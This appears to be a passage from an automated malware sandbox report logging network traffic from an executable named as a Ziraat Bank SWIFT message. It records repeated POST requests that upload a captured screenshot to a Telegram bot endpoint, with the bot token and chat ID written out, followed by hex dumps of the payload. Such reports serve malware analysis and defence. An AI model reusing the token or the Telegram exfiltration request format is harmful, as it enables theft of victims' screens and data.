                                                                        2024-12-12 20:39:00 UTC16355OUTData Raw: 0f 21 e8 91 04 54 a5 a0 aa 05 8b 00 9c da c2 4d c1 3d 90 7d 48 bf ba 2a 70 f6 72 e2 cd cd c2 d3 5b 6d 9d 17 82 1c 13 d6 11 e1 22 05 bb 17 ff 5d 9a be d8 e6 24 01 cf ef 49 bf ee f9 36 5f 08 a5 dd 24 09 a4 9f 27 94 7e 9e 40 ba f5 13 49 bd 71 88 f6 1c 9d 48 ea 8d 83 17 7d 83 58 15 80 f6 b9 cb 24 00 97 4a 24 ff 20 92 7d 11 cf 25 01 18 0a bc a5 12 c8 bc 71 88 44 9f a7 96 7e 35 12 80 a3 8a c0 71 05 20 b7 00 d7 37 01 7b 34 e7 65 9f f0 f1 50 fe 19 e3 be f7 6f 98 00 8c 24 a0 8e fb d2 f7 39 b5 00 54 25 60 2d 00 23 b1 17 c5 22 72 4e 91 7b 3a 02 ec 05 9f 17 81 0b 09 c0 41 82 4f 63 c5 16 42 e2 af a5 12 7f 42 95 80 aa 0c 44 06 d2 22 04 bb c7 dd 91 85 9d 97 7a 12 80 12 7a f4 41 37 06 4b f2 49 fc 51 e9 07 7e 4e 31 e6 b5 9f 62 48 3f aa 01 e7 55 04 16 91 27 e1 c7 7b 01 55
                                                                        Data Ascii: !TM=}H*pr[m"]$I6_$'~@IqH}X$J$ }%qD~5q 7{4ePo$9T%`-#"rN{:AOcBBD"zzA7KIQ~N1bH?U'{U
                                                                        2024-12-12 20:39:00 UTC16355OUTData Raw: be ba b8 b9 44 a4 5b 6e 0c 6e 2b 00 87 08 40 dd 16 bc 54 09 f8 7c 14 80 d3 67 d9 f7 53 a8 e7 56 05 60 3f d1 7b 05 47 45 02 70 e6 fd 0f f5 89 bc c5 52 0b c0 90 11 05 a0 f2 23 69 37 49 bc f8 8b 64 5f 14 f3 2c 55 00 6a 0d 92 af 3d ee 5b c6 b3 36 b7 ab 0b c0 d9 80 99 b7 df db 82 e4 1b 86 84 dd 62 90 f0 93 e0 ab e7 10 7c 9a d3 b8 06 c9 a7 5b 80 bd f8 13 4b 15 80 b5 f0 93 10 54 5f 52 6f 10 e3 08 c0 48 02 22 eb 24 00 55 f5 e7 ab 01 bd 00 f4 79 92 7e 82 18 48 fc b1 2e cb c5 2a af 16 80 d0 1e 23 96 dc ab 84 5f 2d ff f2 6d c0 45 fc 65 d9 47 c5 df 31 77 f4 e4 9f c1 b1 5e 04 1c ef ff cb e3 72 63 30 63 ad cb 6b 9c ec 93 b4 f3 30 af 63 c0 cc 33 96 f8 ab e3 9a 93 00 64 ac 8a 3e 5a 64 20 02 b0 ad ee b3 b8 8e ff 22 04 f5 8e 40 e6 c9 cf 14 f9 37 88 75 b6 27 ad 64 9e 97 7d
                                                                        Data Ascii: D[nn+@T|gSV`?{GEpR#i7Id_,Uj=[6b|[KT_RoH"$Uy~H.*#_-mEeG1w^rc0ck0c3d>Zd "@7u'd}
                                                                        2024-12-12 20:39:00 UTC16355OUTData Raw: d7 cb 3f e2 ad 10 ac 85 9f 13 82 99 22 00 6b 54 e5 87 d4 53 95 1f 78 01 48 d5 9f 8e 09 93 c3 3a bd 03 50 95 7f ad f8 33 74 1c 38 c7 8b dc 93 e8 93 f8 f3 68 ce 8b 3e f0 63 2f 02 25 00 95 d3 3d a6 79 f7 9f 2a ff 74 fc d7 e3 8f fb 4a 04 22 fa 5a c1 57 84 1f 31 e5 fa f9 d9 63 ee 68 2e 12 39 fa f6 34 7d 54 53 11 28 01 48 1f f9 87 18 94 24 d4 25 21 12 82 92 7f 12 72 b5 04 64 4e 02 4f 71 a4 9f 04 20 d0 47 ec 91 43 3e d5 80 ac 25 c6 bb 02 99 f7 7b d2 4a 08 4a d8 09 c6 c8 3b 09 41 2f 00 89 49 fe e9 1d 80 f4 6b 01 48 9e e2 08 3c 09 3b 89 3f 5a f0 97 86 30 4f ae cf a9 e5 a0 df 4b 73 54 f9 a9 d2 4f 52 cf 0b 41 5f ed 57 4b 40 40 e0 49 da 49 e0 21 ec 10 78 92 7f 12 7a b9 92 0f 79 67 71 bf 8e 7c aa fe 34 cf 9c 68 df 21 68 eb a1 96 79 12 80 c4 18 23 07 6b 01 a8 b1 d6 28
                                                                        Data Ascii: ?"kTSxH:P3t8h>c/%=y*tJ"ZW1ch.94}TS(H$%!rdNOq GC>%{JJ;A/IkH<;?Z0OKsTORA_WK@@II!xzygq|4h!hy#k(
                                                                        2024-12-12 20:39:01 UTC389INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0
                                                                        Date: Thu, 12 Dec 2024 20:39:01 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 1814
                                                                        Connection: close
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.549755149.154.167.220443768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 20:39:04 UTC2114OUTPOST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0 [TRUNCATED]
                                                                        Content-Type: multipart/form-data; boundary================8dd1b95b9171c0f
                                                                        Host: api.telegram.org
                                                                        Content-Length: 675718
                                                                        Connection: Keep-Alive
                                                                        2024-12-12 20:39:04 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 62 39 35 62 39 31 37 31 63 30 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70
                                                                        Data Ascii: --===============8dd1b95b9171c0fContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAap
                                                                        2024-12-12 20:39:04 UTC16355OUTData Raw: 9c d9 8b 21 21 41 71 3a fe 94 a7 3b b1 d4 35 c2 4f d7 7a d5 e1 07 08 3e 7f ee 9f 4b 40 c1 0b 3f 10 7d e5 ba ef 4e 74 0e 12 a7 b6 17 43 f4 f1 22 10 ef fa 63 04 3d 1b 50 71 ea 18 79 56 a0 64 a1 3a 06 81 bc 60 4d 5e cf ff 53 07 e0 b2 1d 63 5a 21 d8 08 3a 24 5b 91 71 39 ae 2b bf 08 3e 49 3e c5 18 89 21 08 d9 2f 01 a8 73 bd 8b 8f b9 3a f4 80 f9 9a 5d 79 e1 48 3e ab 91 80 ca a9 de f7 03 75 aa 57 8e 51 2f 11 e1 0c 3f 8b 6b bd 83 84 9d 04 1d b2 0f e9 86 8c 23 c6 1e 62 ec 93 c0 23 2e 49 a7 7d aa 57 4e 73 c7 f7 e8 b3 15 63 ce 19 7c 8e be 27 71 7d 7e f9 ec 06 09 3b 46 c5 56 72 4e 8e 69 94 d0 63 ad 7a d5 0a e2 7e 06 73 5d f7 55 4c 73 ce 42 d0 81 e4 9b 84 1e 6b c4 9c 62 92 74 cc 55 2b 01 c8 ba 3e 87 7a 40 dc b1 f6 bd a2 fe 5c c5 b5 97 3c fb f9 1c d5 11 67 4e ac bc 2d
                                                                        Data Ascii: !!Aq:;5Oz>K@?}NtC"c=PqyVd:`M^ScZ!:$[q9+>I>!/s:]yH>uWQ/?k#b#.I}WNsc|'q}~;FVrNicz~s]ULsBkbtU+>z@\<gN-
                                                                        2024-12-12 20:39:04 UTC16355OUTData Raw: fd 7e 6d 98 d1 eb 25 ff b4 97 39 f2 4f 02 50 fb da bd 88 b3 06 49 3b 40 d0 01 71 09 40 e2 12 80 d4 4a e2 a9 5e 7b 85 62 d4 a8 2e 12 7e aa f7 3a e5 10 7f c0 b5 df ee 4b ce 2c 73 75 04 32 47 ee 21 00 19 79 23 b0 9e f1 a7 0e 40 c9 c0 22 fb 38 93 cf e1 7b 37 39 84 9f 40 e8 21 f6 04 b2 4f 90 a3 86 b9 72 ac 17 2c 00 bd f3 cf e3 9f fc e1 ba 74 fe 05 17 a6 cb ae b8 2a 14 7c a3 18 26 00 1d 97 81 ff c7 37 f2 7f 60 1d 3f f3 d6 df 41 6f fe 75 5c e8 0d 43 42 2c 8a 0d c3 eb 23 8e 58 7b 5e 23 00 eb ee bf c3 33 9f 4a bf bf ef ab a1 8c aa a9 05 e0 0d 37 dc b0 5e 04 60 74 ed d7 89 64 de 7c 58 12 80 fd 82 8e f9 d2 15 e0 f1 78 be 09 c0 0e 02 ae 8a 8d 4b 24 ff 9c 50 fa 39 81 f4 73 5c f2 0d 63 96 98 1b 10 9f 34 eb 5b 00 ae 6f 09 18 c9 3f d8 18 05 20 44 92 6f 18 91 f4 73 6a a1
                                                                        Data Ascii: ~m%9OPI;@q@J^{b.~:K,su2G!y#@"8{79@!Or,t*|&7`?Aou\CB,#X{^#3J7^`td|XxK$P9s\c4[o? Dosj
                                                                        2024-12-12 20:39:04 UTC16355OUTData Raw: bf 9f 23 fc ae 5e 30 f3 bb 1a d5 01 c8 fe 9c e3 f3 ba 47 e7 df 8f 11 89 bd 96 21 f2 0f 5c e2 2d 84 5a cc 0d 8a 4f 9a 48 fa 39 91 f4 73 22 89 b7 10 22 89 b7 10 22 e9 e7 44 52 6f 1c 22 a9 37 0e 91 e4 1b c6 2c 81 b7 50 22 a9 37 0e 81 f0 1b 44 24 f0 16 4a 24 fd 9c 48 e4 2d 84 25 01 38 9c e7 9e 00 ec a7 fb e1 7b c6 62 2e d2 cf 59 88 00 84 d9 02 70 81 04 52 6f 1c 10 80 a2 74 e2 8d 8b c9 bc 88 41 42 51 f9 5a 00 76 de 71 5b 21 92 7e 4e 24 00 bb 6f bb 79 16 91 d4 1b 87 48 fa 39 91 e4 73 ea 2b c4 93 10 80 11 91 dc ab 3b ff 14 73 90 7c f5 15 61 70 01 38 97 2e c0 28 0f 2e fc bc 56 73 ae fc 8a f6 3a 6f 43 11 7c 55 cd 2c 46 08 40 c9 bf ce 2b af ee 93 80 9a 23 f9 24 01 25 ff 40 02 50 52 70 10 48 3c c9 3b e4 9f 5f 27 ee 13 7a 4d 5e 73 49 c0 41 c2 10 c1 87 f4 43 00 22 fa
                                                                        Data Ascii: #^0G!\-ZOH9s"""DRo"7,P"7D$J$H-%8{b.YpRotABQZvq[!~N$oyH9s+;s|ap8.(.Vs:oC|U,F@+#$%@PRpH<;_'zM^sIAC"
                                                                        2024-12-12 20:39:04 UTC16355OUTData Raw: 80 c4 26 bf f4 57 b5 65 bd f9 c8 40 05 a0 72 4d b9 87 58 03 c5 9d 22 0e e9 d6 8a 3e f3 cc 65 1f f3 21 0a 3b 63 ee a9 10 a4 65 6c 8e c2 71 94 7c 43 9b ad 57 e4 29 fb 90 78 de fa 0b c4 89 29 f7 cc 01 e6 c8 e1 36 61 41 08 ba 86 b1 c2 ec f0 49 9f 1a bf 05 48 cb 58 19 47 5f 01 07 8e 91 71 e6 44 01 27 e4 32 4f 4b 6e cc 37 ee 7e 10 c7 bc 83 cf a0 b5 1f f3 d9 c3 18 d8 27 ee dc 2c 89 47 1c 11 28 f1 66 5f 69 c7 11 f7 da 7b 01 b8 1d 8e 53 01 98 cd 67 52 6f 15 ea de 2b 54 ec a5 ef b0 02 d9 9e 3b 63 fb c7 87 61 55 e1 d7 a2 00 54 02 ca 58 0d f8 c1 07 bb 03 1f ea 46 18 af 5d 71 7f 59 db cb c0 2d df 0e 5c b1 12 50 e9 87 08 94 28 01 ab 84 2b ed 94 f4 3b ef f6 5d 15 80 51 f8 b5 44 41 b7 d7 64 82 6f 11 ad 00 6c c9 24 dd f1 c0 5e 09 c0 79 ec 54 00 2e 43 26 f9 e6 91 49 bf 88
                                                                        Data Ascii: &We@rMX">e!;celq|CW)x)6aAIHXG_qD'2OKn7~',G(f_i{SgRo+T;caUTXF]qY-\P(+;]QDAdol$^yT.C&I
                                                                        2024-12-12 20:39:04 UTC16355OUTData Raw: a2 85 12 70 ba ca 6e 76 ac 07 41 37 dd 66 3f 67 a4 cf dd 4d e2 f3 a7 e1 bd 23 1c fd b5 f5 e8 70 7b 64 f8 e0 07 ef ef 36 0a 07 ae 3c 5a fe ac ef 2d 7f a6 e5 67 47 80 22 1b eb f7 03 cb ff 56 40 f3 ed 40 51 04 b6 28 eb 66 71 e0 dc 9e 4c 9a c1 94 e4 2b 64 12 11 da 3c f0 fb 80 2d b5 a2 31 b4 c7 82 c9 d9 b7 cc 64 91 dc 5b 06 8f 08 6f 97 4c fa ad 42 26 05 57 21 93 7e 91 ad 42 af a5 bc c7 2e b1 dd 23 c2 73 79 d7 0f e6 b2 17 c2 70 f2 ce ad a2 6f b7 98 bc fd e6 29 32 e9 17 59 7f 7b 59 d7 c4 32 11 38 93 3f f8 5e b7 f6 fb b3 59 5f 91 b5 b7 7c 77 9a 37 4f 0b c1 55 d9 f8 bd ef cf 65 fd 4d e5 77 50 d8 58 82 f5 37 de b4 85 b5 df 2d ef 5d da 2c b7 9f eb 45 e0 76 51 00 2e 0b f2 cf b6 25 3b 3a 6c 05 e0 76 99 27 f1 76 2a 09 01 01 b8 88 f5 5f fb d6 16 d6 7e f5 ef 2a 99 14 8c
                                                                        Data Ascii: pnvA7f?gM#p{d6<Z-gG"V@@Q(fqL+d<-1d[oLB&W!~B.#sypo)2Y{Y28?^Y_|w7OUeMwPX7-],EvQ.%;:lv'v*_~*
                                                                        2024-12-12 20:39:04 UTC16355OUTData Raw: 19 08 e7 1c 3b 01 b8 17 12 30 93 7e 91 28 f0 22 13 05 5d 32 37 0b d7 8c 2c 21 00 b9 bd 77 1e 99 f4 8b 64 d2 2f 92 49 b9 63 49 2a ff 00 91 d7 88 bd 55 79 28 04 e0 56 09 98 0b bb dd c2 6f 01 66 32 0f 1e e9 02 10 32 f1 27 fb 02 70 9a 4c f6 65 1c 2b 01 98 a1 fc 5b 46 00 4a 2b fe a4 95 7b 2d 59 ce 6e 0b c0 58 f1 17 05 60 5c db ca 3f 51 ee cd 12 80 31 16 05 a0 22 af 15 80 ad 04 64 ac dc ab fd 61 9d 02 90 aa bf 65 05 20 2d 47 7f 0f 51 6d 18 8e 01 cf 43 d1 27 b1 62 10 94 7f 0a 40 51 00 72 fc 97 16 e9 47 3c 5e 00 52 fb 67 6d 1e fb 05 a5 9f 55 7e f4 39 f6 8b f0 33 c7 31 df 0b 6c e5 1f 97 82 c0 a1 b3 7a 14 7f 51 00 52 01 e8 37 01 91 78 10 bf 01 a8 c8 ab 15 7c cd 78 14 7b 83 1c 8c 95 81 51 00 9a ef 65 1f b3 04 20 15 80 0a 3d 05 60 15 7b c3 85 20 56 fe 21 ff 8c 79 1c
                                                                        Data Ascii: ;0~("]27,!wd/IcI*Uy(Vof22'pLe+[FJ+{-YnX`\?Q1"dae -GQmC'b@QrG<^RgmU~931lzQR7x|x{Qe =`{ V!y
                                                                        2024-12-12 20:39:04 UTC16355OUTData Raw: 0f 21 e8 91 04 54 a5 a0 aa 05 8b 00 9c da c2 4d c1 3d 90 7d 48 bf ba 2a 70 f6 72 e2 cd cd c2 d3 5b 6d 9d 17 82 1c 13 d6 11 e1 22 05 bb 17 ff 5d 9a be d8 e6 24 01 cf ef 49 bf ee f9 36 5f 08 a5 dd 24 09 a4 9f 27 94 7e 9e 40 ba f5 13 49 bd 71 88 f6 1c 9d 48 ea 8d 83 17 7d 83 58 15 80 f6 b9 cb 24 00 97 4a 24 ff 20 92 7d 11 cf 25 01 18 0a bc a5 12 c8 bc 71 88 44 9f a7 96 7e 35 12 80 a3 8a c0 71 05 20 b7 00 d7 37 01 7b 34 e7 65 9f f0 f1 50 fe 19 e3 be f7 6f 98 00 8c 24 a0 8e fb d2 f7 39 b5 00 54 25 60 2d 00 23 b1 17 c5 22 72 4e 91 7b 3a 02 ec 05 9f 17 81 0b 09 c0 41 82 4f 63 c5 16 42 e2 af a5 12 7f 42 95 80 aa 0c 44 06 d2 22 04 bb c7 dd 91 85 9d 97 7a 12 80 12 7a f4 41 37 06 4b f2 49 fc 51 e9 07 7e 4e 31 e6 b5 9f 62 48 3f aa 01 e7 55 04 16 91 27 e1 c7 7b 01 55
                                                                        Data Ascii: !TM=}H*pr[m"]$I6_$'~@IqH}X$J$ }%qD~5q 7{4ePo$9T%`-#"rN{:AOcBBD"zzA7KIQ~N1bH?U'{U
                                                                        2024-12-12 20:39:04 UTC16355OUTData Raw: be ba b8 b9 44 a4 5b 6e 0c 6e 2b 00 87 08 40 dd 16 bc 54 09 f8 7c 14 80 d3 67 d9 f7 53 a8 e7 56 05 60 3f d1 7b 05 47 45 02 70 e6 fd 0f f5 89 bc c5 52 0b c0 90 11 05 a0 f2 23 69 37 49 bc f8 8b 64 5f 14 f3 2c 55 00 6a 0d 92 af 3d ee 5b c6 b3 36 b7 ab 0b c0 d9 80 99 b7 df db 82 e4 1b 86 84 dd 62 90 f0 93 e0 ab e7 10 7c 9a d3 b8 06 c9 a7 5b 80 bd f8 13 4b 15 80 b5 f0 93 10 54 5f 52 6f 10 e3 08 c0 48 02 22 eb 24 00 55 f5 e7 ab 01 bd 00 f4 79 92 7e 82 18 48 fc b1 2e cb c5 2a af 16 80 d0 1e 23 96 dc ab 84 5f 2d ff f2 6d c0 45 fc 65 d9 47 c5 df 31 77 f4 e4 9f c1 b1 5e 04 1c ef ff cb e3 72 63 30 63 ad cb 6b 9c ec 93 b4 f3 30 af 63 c0 cc 33 96 f8 ab e3 9a 93 00 64 ac 8a 3e 5a 64 20 02 b0 ad ee b3 b8 8e ff 22 04 f5 8e 40 e6 c9 cf 14 f9 37 88 75 b6 27 ad 64 9e 97 7d
                                                                        Data Ascii: D[nn+@T|gSV`?{GEpR#i7Id_,Uj=[6b|[KT_RoH"$Uy~H.*#_-mEeG1w^rc0ck0c3d>Zd "@7u'd}
                                                                        2024-12-12 20:39:04 UTC16355OUTData Raw: d7 cb 3f e2 ad 10 ac 85 9f 13 82 99 22 00 6b 54 e5 87 d4 53 95 1f 78 01 48 d5 9f 8e 09 93 c3 3a bd 03 50 95 7f ad f8 33 74 1c 38 c7 8b dc 93 e8 93 f8 f3 68 ce 8b 3e f0 63 2f 02 25 00 95 d3 3d a6 79 f7 9f 2a ff 74 fc d7 e3 8f fb 4a 04 22 fa 5a c1 57 84 1f 31 e5 fa f9 d9 63 ee 68 2e 12 39 fa f6 34 7d 54 53 11 28 01 48 1f f9 87 18 94 24 d4 25 21 12 82 92 7f 12 72 b5 04 64 4e 02 4f 71 a4 9f 04 20 d0 47 ec 91 43 3e d5 80 ac 25 c6 bb 02 99 f7 7b d2 4a 08 4a d8 09 c6 c8 3b 09 41 2f 00 89 49 fe e9 1d 80 f4 6b 01 48 9e e2 08 3c 09 3b 89 3f 5a f0 97 86 30 4f ae cf a9 e5 a0 df 4b 73 54 f9 a9 d2 4f 52 cf 0b 41 5f ed 57 4b 40 40 e0 49 da 49 e0 21 ec 10 78 92 7f 12 7a b9 92 0f 79 67 71 bf 8e 7c aa fe 34 cf 9c 68 df 21 68 eb a1 96 79 12 80 c4 18 23 07 6b 01 a8 b1 d6 28
                                                                        Data Ascii: ?"kTSxH:P3t8h>c/%=y*tJ"ZW1ch.94}TS(H$%!rdNOq GC>%{JJ;A/IkH<;?Z0OKsTORA_WK@@II!xzygq|4h!hy#k(
                                                                        2024-12-12 20:39:06 UTC389INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0
                                                                        Date: Thu, 12 Dec 2024 20:39:06 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 1814
                                                                        Connection: close
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.549767149.154.167.220443768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 20:39:09 UTC2114OUTPOST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0 [TRUNCATED]
                                                                        Content-Type: multipart/form-data; boundary================8dd1bce777f00f4
                                                                        Host: api.telegram.org
                                                                        Content-Length: 675718
                                                                        Connection: Keep-Alive
                                                                        2024-12-12 20:39:09 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 62 63 65 37 37 37 66 30 30 66 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70
                                                                        Data Ascii: --===============8dd1bce777f00f4Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAap
                                                                        2024-12-12 20:39:09 UTC16355OUTData Raw: 9c d9 8b 21 21 41 71 3a fe 94 a7 3b b1 d4 35 c2 4f d7 7a d5 e1 07 08 3e 7f ee 9f 4b 40 c1 0b 3f 10 7d e5 ba ef 4e 74 0e 12 a7 b6 17 43 f4 f1 22 10 ef fa 63 04 3d 1b 50 71 ea 18 79 56 a0 64 a1 3a 06 81 bc 60 4d 5e cf ff 53 07 e0 b2 1d 63 5a 21 d8 08 3a 24 5b 91 71 39 ae 2b bf 08 3e 49 3e c5 18 89 21 08 d9 2f 01 a8 73 bd 8b 8f b9 3a f4 80 f9 9a 5d 79 e1 48 3e ab 91 80 ca a9 de f7 03 75 aa 57 8e 51 2f 11 e1 0c 3f 8b 6b bd 83 84 9d 04 1d b2 0f e9 86 8c 23 c6 1e 62 ec 93 c0 23 2e 49 a7 7d aa 57 4e 73 c7 f7 e8 b3 15 63 ce 19 7c 8e be 27 71 7d 7e f9 ec 06 09 3b 46 c5 56 72 4e 8e 69 94 d0 63 ad 7a d5 0a e2 7e 06 73 5d f7 55 4c 73 ce 42 d0 81 e4 9b 84 1e 6b c4 9c 62 92 74 cc 55 2b 01 c8 ba 3e 87 7a 40 dc b1 f6 bd a2 fe 5c c5 b5 97 3c fb f9 1c d5 11 67 4e ac bc 2d
                                                                        Data Ascii: !!Aq:;5Oz>K@?}NtC"c=PqyVd:`M^ScZ!:$[q9+>I>!/s:]yH>uWQ/?k#b#.I}WNsc|'q}~;FVrNicz~s]ULsBkbtU+>z@\<gN-
                                                                        2024-12-12 20:39:09 UTC16355OUTData Raw: fd 7e 6d 98 d1 eb 25 ff b4 97 39 f2 4f 02 50 fb da bd 88 b3 06 49 3b 40 d0 01 71 09 40 e2 12 80 d4 4a e2 a9 5e 7b 85 62 d4 a8 2e 12 7e aa f7 3a e5 10 7f c0 b5 df ee 4b ce 2c 73 75 04 32 47 ee 21 00 19 79 23 b0 9e f1 a7 0e 40 c9 c0 22 fb 38 93 cf e1 7b 37 39 84 9f 40 e8 21 f6 04 b2 4f 90 a3 86 b9 72 ac 17 2c 00 bd f3 cf e3 9f fc e1 ba 74 fe 05 17 a6 cb ae b8 2a 14 7c a3 18 26 00 1d 97 81 ff c7 37 f2 7f 60 1d 3f f3 d6 df 41 6f fe 75 5c e8 0d 43 42 2c 8a 0d c3 eb 23 8e 58 7b 5e 23 00 eb ee bf c3 33 9f 4a bf bf ef ab a1 8c aa a9 05 e0 0d 37 dc b0 5e 04 60 74 ed d7 89 64 de 7c 58 12 80 fd 82 8e f9 d2 15 e0 f1 78 be 09 c0 0e 02 ae 8a 8d 4b 24 ff 9c 50 fa 39 81 f4 73 5c f2 0d 63 96 98 1b 10 9f 34 eb 5b 00 ae 6f 09 18 c9 3f d8 18 05 20 44 92 6f 18 91 f4 73 6a a1
                                                                        Data Ascii: ~m%9OPI;@q@J^{b.~:K,su2G!y#@"8{79@!Or,t*|&7`?Aou\CB,#X{^#3J7^`td|XxK$P9s\c4[o? Dosj
                                                                        2024-12-12 20:39:09 UTC16355OUTData Raw: bf 9f 23 fc ae 5e 30 f3 bb 1a d5 01 c8 fe 9c e3 f3 ba 47 e7 df 8f 11 89 bd 96 21 f2 0f 5c e2 2d 84 5a cc 0d 8a 4f 9a 48 fa 39 91 f4 73 22 89 b7 10 22 89 b7 10 22 e9 e7 44 52 6f 1c 22 a9 37 0e 91 e4 1b c6 2c 81 b7 50 22 a9 37 0e 81 f0 1b 44 24 f0 16 4a 24 fd 9c 48 e4 2d 84 25 01 38 9c e7 9e 00 ec a7 fb e1 7b c6 62 2e d2 cf 59 88 00 84 d9 02 70 81 04 52 6f 1c 10 80 a2 74 e2 8d 8b c9 bc 88 41 42 51 f9 5a 00 76 de 71 5b 21 92 7e 4e 24 00 bb 6f bb 79 16 91 d4 1b 87 48 fa 39 91 e4 73 ea 2b c4 93 10 80 11 91 dc ab 3b ff 14 73 90 7c f5 15 61 70 01 38 97 2e c0 28 0f 2e fc bc 56 73 ae fc 8a f6 3a 6f 43 11 7c 55 cd 2c 46 08 40 c9 bf ce 2b af ee 93 80 9a 23 f9 24 01 25 ff 40 02 50 52 70 10 48 3c c9 3b e4 9f 5f 27 ee 13 7a 4d 5e 73 49 c0 41 c2 10 c1 87 f4 43 00 22 fa
